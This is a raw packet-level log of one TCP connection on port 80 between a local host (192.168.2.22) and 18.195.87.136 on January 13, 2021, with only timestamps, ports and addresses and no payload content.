Jan 13, 2021 17:17:31.984920025 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984936953 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984939098 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984954119 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984958887 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984973907 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984975100 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984992981 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985002041 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985012054 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985019922 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985038996 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985054970 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985070944 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985071898 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985076904 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985084057 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985088110 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985093117 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985104084 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985107899 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985119104 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985141039 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985145092 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985161066 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985168934 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985186100 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985193968 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985204935 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985217094 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985230923 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985238075 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985255003 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985265970 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985274076 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985290051 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985301018 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985313892 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985327005 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985337019 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985344887 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985363960 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985375881 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985403061 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985409021 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985436916 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985454082 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985460997 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985470057 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985486031 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985496998 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985508919 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985513926 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985533953 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985543013 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985554934 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985574961 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985575914 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985594988 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985599041 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985610962 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985620975 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985634089 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985641956 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985651016 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985663891 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985681057 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985682964 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985697031 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985707045 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985718012 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985728979 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985745907 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985755920 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985773087 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985780001 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985794067 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985802889 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985816956 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985825062 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985835075 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985846996 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985867977 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985867977 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985879898 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985889912 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985909939 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985910892 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985924959 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985934019 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985955000 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985960007 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985975981 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.985984087 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.985995054 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986006975 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986021996 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986028910 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986032963 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986051083 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986063004 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986072063 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986080885 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986093044 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986108065 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986114025 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986124039 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986139059 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986148119 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986164093 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986176014 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986185074 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986198902 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986205101 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986213923 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986226082 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986243010 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986246109 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986260891 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986268044 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986274958 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986288071 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986304998 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986314058 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986327887 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986335993 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986349106 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986356974 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986367941 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986382008 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986392021 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986404896 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986418962 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986424923 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986442089 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986445904 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986457109 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986469030 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986480951 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986493111 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986495018 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986516953 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986530066 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986537933 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986552954 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986561060 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986576080 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986584902 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986598969 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986605883 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986627102 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986641884 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986648083 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986649990 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986654043 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986674070 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986682892 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986697912 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986711025 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986718893 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986735106 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986742020 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986751080 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986764908 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986777067 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986784935 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986793041 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986807108 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986819029 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986826897 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986844063 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986854076 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986861944 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986876965 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986888885 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986897945 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986910105 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986920118 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986932039 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986939907 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986948013 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986960888 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986973047 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.986982107 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.986987114 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987000942 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987018108 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987025023 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987034082 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987047911 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987059116 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987070084 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987073898 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987091064 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987102985 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987112045 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987119913 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987133026 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987144947 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987154007 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987162113 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987174988 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987195015 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987198114 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987210035 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987221003 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987224102 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987242937 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987256050 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987265110 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987276077 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987286091 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987299919 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987307072 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987315893 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987328053 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987343073 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987349033 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987360001 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987380028 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987390995 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987401962 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987415075 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987422943 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987435102 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987445116 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987458944 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987466097 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987473011 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987487078 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987500906 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987507105 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987528086 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987529039 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987535954 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987554073 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987566948 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987576962 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987588882 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987598896 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987612963 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987621069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987633944 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987642050 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987657070 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987663031 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987673044 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987684965 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987696886 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987705946 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987718105 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987730980 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987742901 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987754107 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987767935 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987773895 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987790108 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987795115 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987808943 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987817049 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987831116 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987839937 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987859964 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987863064 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987879992 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987884998 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987899065 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987910986 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987935066 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987936020 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987943888 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987960100 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987972975 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.987982035 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.987993002 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988006115 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988019943 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988027096 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988035917 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988049984 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988064051 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988074064 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988078117 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988099098 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988109112 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988123894 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988135099 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988147020 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988157988 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988171101 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988174915 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988194942 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988205910 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988218069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988229036 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988240957 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988243103 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988265038 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988275051 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988291025 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988301039 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988317013 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988325119 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988339901 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988349915 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988363981 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988373995 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988387108 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.988398075 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.988411903 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.999167919 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.000449896 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024594069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024621010 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024636984 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024645090 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024653912 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024671078 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024672985 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024677992 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024688959 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024691105 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024703026 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024709940 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024728060 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024732113 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024741888 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024753094 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024760962 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024771929 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024787903 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024790049 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024805069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024806023 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024820089 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024822950 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024837017 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024842024 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:32.024853945 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:32.024858952 CET	80	49165	18.195.87.136	192.168.2.22
